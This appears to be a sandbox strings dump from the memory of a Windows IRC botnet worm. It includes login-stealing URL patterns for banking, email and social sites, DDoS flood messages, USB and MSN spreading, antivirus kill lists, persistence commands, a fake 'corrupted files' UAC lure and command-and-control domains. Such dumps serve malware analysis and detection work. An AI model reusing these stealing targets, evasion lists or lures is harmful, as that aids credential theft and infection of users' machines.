[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

7 767<7~7

8*808;8~8

{A5DCBF10-6530-11D2-901F-00C04FB951ED}

shlwapi.dll

crypt32.dll

wtsapi32.dll

samcli.dll

netutils.dll

userenv.dll

WindowsSecondaryDesktop

\charmap.exe

\Windows Media Player\wmprph.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\fdsfifew.exe

%s\Identities\%s.exe

\\.\pipe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

secur32.dll

ws2_32.dll

:%S%S\

winlogon.exe

Aadvapi32.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

svchost.exe_1340_rwx_000D0000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

-%sMutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

[%s{%s%s{%s

n%s[%s{%s%s{%s

%s[%s{%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

\\.\%c:

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

m1xg.org

mxxtxxt.biz

meob.me

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

SSRR %s 0 0 :%s

KCIK %s

SEND %s %s

PART %s

PPPPMSG %s :%s

QUIT :%s

PPNG %s

PPPPMSG

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\c1419a97

%System%\svchost.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe

7 767<7~7

8*808;8~8

%s\Identities\%s.exe

\\.\pipe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\

winlogon.exe

notepad.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\fdsfifew.exe

svchost.exe_1340_rwx_00120000_00095000:

.text

`.rdata

@.data

.rsrc

@.reloc

PSSSSSSh

PSSVSSh

RPVSSh

PSSh(

PSSh#

PSSh'

PSSh&

PSSh*

9p.uV

Opera/9.00 (Windows NT 5.1; U; en)

Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)

Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)

Opera 9.4 (Windows NT 6.1; U; en)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)

Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)

SbieDll.dll

Software\Classes\CLSID\%s\X

Software\Classes\CLSID\%s\X\%s

0xX

SB:0xX

G:%s_0xX_%c:%s_v1$

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u

IEXPLORE.EXE

IE.HTTP

SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

IE.HTTPS

SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice

IE.AssocFile.HTM

HTTP\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Ext\Settings\%s

Psapi.dll

%s\%s

Software\Adobe\Acrobat Reader\%s\Privileged

mscoree.dll

HARDWARE\DESCRIPTION\System\CentralProcessor\%u

SOFTWARE\Microsoft\Windows NT\CurrentVersion

nspr4.dll

nss3.dll

Urlmon.dll

URLDownloadToFileW

Netapi32.dll

76487-640-1457236-23837

76487-337-8429955-22614

76487-644-3177037-23510

76497-640-6308873-23835

55274-640-2673064-23950

76487-640-8834005-23195

76487-640-0716662-23535

76487-644-8648466-23106

00426-293-8170032-85146

76487-341-5883812-22420

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer

SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup

{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}

snxhk.dll

comctl32.dll

ZwSetValueKey

ZwDeleteValueKey

SOFTWARE\%s

update.microsoft.com

microsoft.com

windowsupdate.microsoft.com

JOIN

PRIVMSG

.rdata

cmd_option.%s

/c %s

cmd.exe

msvcrt.dll

--x-x-x-xx

Content-Type: multipart/form-data; boundary=x-x-x-xx

Content-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"

%s?action=up&g=%s

xul.dll

Content-Type: application/x-www-form-urlencoded

HTTP/1.1

?pid=%d

?page=%d

?id=%u

%s=%u&%s=%s

%s=%s&%s=%u

&%s=%s

&%s%u=

&%s%hu=

&%s=_%u

%d|%s|%s|%s

.info

httpget

GET /%s HTTP/1.1

Host: %s

Content-Length: %d

Accept: %s

Accept-Language: %s

Accept-Charset: %s

Accept-Encoding: %s

User-Agent: %s

Referer: %s

Connection: %s

http://

iexplore.exe

firefox.exe

tbb-firefox.exe

%s:%hu

windowsupdate

SSH2_MSG_KEXINIT

SSH2_MSG_DISCONNECT

SSH2_MSG_USERAUTH_SUCCESS

http://%s%s/image.php?id=%s

TaskDialogIndirect

http://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535

ÐxX

ntdll.dll

kernel32.dll

secur32.dll

crypt32.dll

user32.dll

advapi32.dll

wininet.dll

shell32.dll

shlwapi.dll

ole32.dll

version.dll

sfc.dll

dnsapi.dll

ws2_32.dll

8"808]9|9

9%9 919<9

=(=/=6==={=

4 4?4^4}4

6o6g6r6w6

9 9$9(90949

Invalid parameter passed to C runtime function.

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

GetProcessWindowStation

USER32.DLL

EnumDesktopWindows

SetWindowsHookExA

SetProcessWindowStation

SetWindowsHookW

UnregisterHotKey

ExitWindowsEx

GetAsyncKeyState

EnumWindows

GetKeyState

USER32.dll

SHELL32.dll

RegCloseKey

RegQueryInfoKeyA

RegOpenKeyExW

RegOpenKeyExA

RegCreateKeyW

RegCreateKeyA

ADVAPI32.dll

GDI32.dll

SHLWAPI.dll

GetProcessHeap

GetCPInfo

KERNEL32.dll

i%fOLK

>Z.DI

Q}.UbU

%S.Ny

J[ÿF

#Q.RP

[.ivH

|:v%X

ym.sg

X*.x.aVkyJ1

.Po7VE

M%Doz

,v.XS

Software\Classes\CLSID\%S

G:%S_0xX

chrome.exe

opera.exe

safari.exe

maxthon.exe

:Mozilla\Firefox\Profiles

cookies.sqlite

%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*

%s\winsxs\%s\comctl32.dll

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s

%s:*:Enabled

avcuf32.dll

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

prstrui.exe

Windows Defender

MpClient.dll

Windows Defender\MSASCui.exe

MpSvc.dll

msseces.exe

MsMpEng.exe

MSASCui.exe

MpAsDesc.dll

MsMpLics.dll

avgui.exe

avgidsagent.exe

avgwdsvc.exe

avgdiagex.exe

avgmfapx.exe

avgupd.exe

avgcfgex.exe

avgnt.exe

avguard.exe

avshadow.exe

avcenter.exe

update.dll

updaterc.dll

usrreq.exe

ccsvchst.exe

symerr.exe

NIS.exe

NAV.exe

navw32.exe

avastui.exe

AvastEmUpdate.exe

ashUpd.exe

WRSA.exe

zatray.exe

ForceField.exe

updating.dll

fshoster32.exe

fsaua.dll

PSUNMain.exe

PSUAService.exe

PSANHost.exe

PSUNScan.dll

epavjobs.exe

AVENGINE.exe

Upgrader.exe

adaware.exe

BullGuard.exe.manifest

BullGuardUpdate.exe

BullGuard.exe

BullGuardScanner.exe

BullGuardBhvScanner.exe

BullGuardUpdate2.exe

BgScan.exe

BgScanEngine.dll

.manifest

updater.exe

Backup\RSD\RSSetup\updater.exe

RsTray.exe

RavMonD.exe

RsMgrSvc.exe

rsmain.exe

RsScan.dll

RsTray.dll

mbamgui.exe

mbam.exe

pctsGui.exe

pctsAuxs.exe

pctsSvc.exe

Update.exe

UpdateHlpr.dll

Definitions\vcore.dll

sbamui.exe

SBAMTray.exe

updater_client_mod.dll

FProtTray.exe

FPWin.exe

scf.dat

ALUpdate.exe

update_tmp.exe

arcaclean.exe

BavUpdater.exe

rcfp.exe

CLPSLA.exe

op_mon.exe

niu.exe

K7TSUpdT.exe

sguardxup.exe

ccupdate.exe

caupdate.dll

a2guard.exe

a2start.exe

a2service.exe

AVKTray.exe

GDSC.exe

AVK.exe

GDFirewallTray.exe

Bka.exe

BLuPro.exe

BkavSystemServer.exe

BkavService.exe

LiveUpdate.dll

LiveConnect.dll

BaseFile\Bkav\LiveUpdate.dll

V3Lite.exe

ASDSvc.exe

autoup.exe

downloader.exe

%s.config

updatesrv.exe

updatemgr.dll

egui.exe

ekrn.exe

x86\ekrn.exe

uWinMgr.exe

coreServiceShell.exe

uiSeAgnt.exe

uiWatchDog.exe

plugins\plugUpdater.dll

UiFrmwrk\uiUpdateTray.exe

coreFrameworkHost.exe

mcagent.exe

McSvHost.exe

McUICnt.exe

McPvTray.exe

mcui_exe

mcpltui_exe

mcshell.exe

mcupdmgr.exe

mcupdate.exe

mcshield.exe

mcupdui.dll

McAPExe.exe

.config

Image File Execution Options\%s

SYSTEM\CurrentControlSet\services\%s

%c:\ntusbdriver.sys

%c:\*p.exe

%c:\%s

p.exe

%WinDir%\explorer.exe

/C start /d. %s&"%s"

%COMSPEC%

%WinDir%\system32\shell32.dll

%c:\%s.lnk

VisthAux.exe

explorer.exe

t.minecraft

Works! PID: %d, Name: %s

cmdvirth

%s%s\X

tcp://

svchost.exe

csrss.exe

lsass.exe

smss.exe

wscript.exe

cscript.exe

vbc.exe

rundll32.exe

regsvr32.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

winlogon.exe

services.exe

%s\x.lnk

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%s

desktop.ini

SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows

wintrust.dll

chrome.dll

Applications\iexplore.exe\shell\open\command

%s_xx

x.zip

Navw32.exe

SysInspector.exe

avscan.exe

mfefire.exe

wuauclt.exe

WerFault.exe

lFileZilla\sitemanager.xml

port

Sites.dat

Quick.dat

%s\3\%s

%s\4\%s

spoolsv.exe

steam.exe

skype.exe

origin.exe

dwm.exe

tapi3.dll

/C copy "%s" "%s"

SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run

Windows Update Service

"%s" /%s

Software\Microsoft\Windows\CurrentVersion\RunOnce

/CREATE /SC ONLOGON /TN "Windows Update Check - 0xX" /TR "%s" /RL HIGHEST

schtasks.exe

/DELETE /TN "Windows Update Check - 0xX" /F

\Windows\Explorer.exe

Low_X

%s.manifest

PendingFileRenameOperations

%s\X

Windows\CurrentVersion\Run

CurrentVersion\Windows

Windows NT\CurrentVersion\Image File Execution Options\%s

Windows has encountered a corrupted folder on your hard drive

Multiple corrupted files have been found in the folder 'My Documents'. To prevent serious loss of data, please allow Windows to restore these files.

Corrupted folder: %s

Corrupted file count: %d

%s

/c start "" "%s" /%s "%s"

shell32,ShellExec_RunDLL "%s" /%s "%s"

You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.

Windows 3.1 Update Service

%s:Zone.Identifier

%s\X.pif

%WinDir%

%Documents and Settings%\%current user%

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\All Users\Application Data

%Documents and Settings%\%current user%\My Documents\My Pictures

%Documents and Settings%\%current user%\My Documents\My Music

%Documents and Settings%\%current user%\My Documents\My Videos

%Program Files%

%WinDir%\winsxs\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\comctl32.dll

%WinDir%\explorer.exe

s\"%CurrentUserName%"\Local Settings\Temp\dfwef.exe

%Program Files%\Common Files\CreativeAudio\rqmynangs.exe

%Documents and Settings%\%current user%\0E7302EC.pif

%Program Files%\Common Files\CreativeAudio

dfwef.exe

%Documents and Settings%\%current user%\Low_00FEC012

rqmynangs.exe

0E7302EC.pif

KERNEL32.DLL

KERNELBASE.DLL

kernelbase.dll

1.2.3.4532

YandexDiskStarter.exe

Yandex.Disk

svchost.exe_1340_rwx_00A10000_00029000:

.text

`.data

.rsrc

@.reloc

*windows defender*

*windowsupdate*

*drweb*

dwwin.exe

kernel32.dll

iphlpapi.dll

GetExtendedTcpTable

GetOwnerModuleFromTcpEntry

%systemroot%

%programfiles%\Common Files\*\*.exe

%appdata%\Identities\*.exe

%root%\RECYCLER\S-1-5-21-0243556031-888888379-*\*.exe

ole32.dll

/c "%%SystemRoot%%\explorer.exe %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib  s  h %Í%%%s & start %%temp%%\%s\%s & exit"

/c "start %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib  s  h %Í%%%s & start %%temp%%\%s\%s & exit"

%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe

%SystemRoot%\system32\SHELL32.dll

%s\c731200

%s\%s

%s\%s.lnk

Windows_Shared_Mutex_231_c000100

ntdll.dll

\ScreenSaverPro.scr

\temp.bin

user32.dll

advapi32.dll

shell32.dll

urlmon.dll

wininet.dll

gdi32.dll

rpcrt4.dll

netapi32.dll

*.exe

.gonewiththewings

*.gonewiththewings

WinExec

URLDownloadToFileA

http://www.google.com

\calc.exe

\Reader_sl.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

notepad.exe

\notepad.exe

\svchost.exe

WindowsId

Identities\%s

%s\%s\%s.exe

:Zone.Identifier

.quarantined

"%s" -shell

"%s" -bind

userinit.exe

explorer.exe

Windows critical error, require reboot

Windows Update

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

GetProcessHeap

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyA

RegEnumKeyA

RegCreateKeyExA

RegOpenKeyExA

ADVAPI32.dll

ShellExecuteExW

SHELL32.dll

SetTcpEntry

SHLWAPI.dll

RPCRT4.dll

NETAPI32.dll

DNSAPI.dll

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

Software\WindowsId Manager Reader

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Software\Microsoft\Windows\CurrentVersion\Run

Software\Microsoft\Windows\CurrentVersion\RunOnce

WindowsMark

m1xg.org

mxxtxxt.biz

meob.me

%System%\notepad.exe

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0A

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

%s_%d

-%sMutex

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

[%s{%s%s{%s

n%s[%s{%s%s{%s

%s[%s{%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

\\.\%c:

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

URLDownloadToFileW

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

Secur32.dll

ShellExecuteA

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

WS2_32.dll

MSVCRT.dll

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

RegNotifyChangeKeyValue

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

SSRR %s 0 0 :%s

KCIK %s

SEND %s %s

PART %s

PPPPMSG %s :%s

QUIT :%s

PPNG %s

PPPPMSG

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

7 767<7~7

8*808;8~8

{A5DCBF10-6530-11D2-901F-00C04FB951ED}

shlwapi.dll

crypt32.dll

wtsapi32.dll

samcli.dll

netutils.dll

userenv.dll

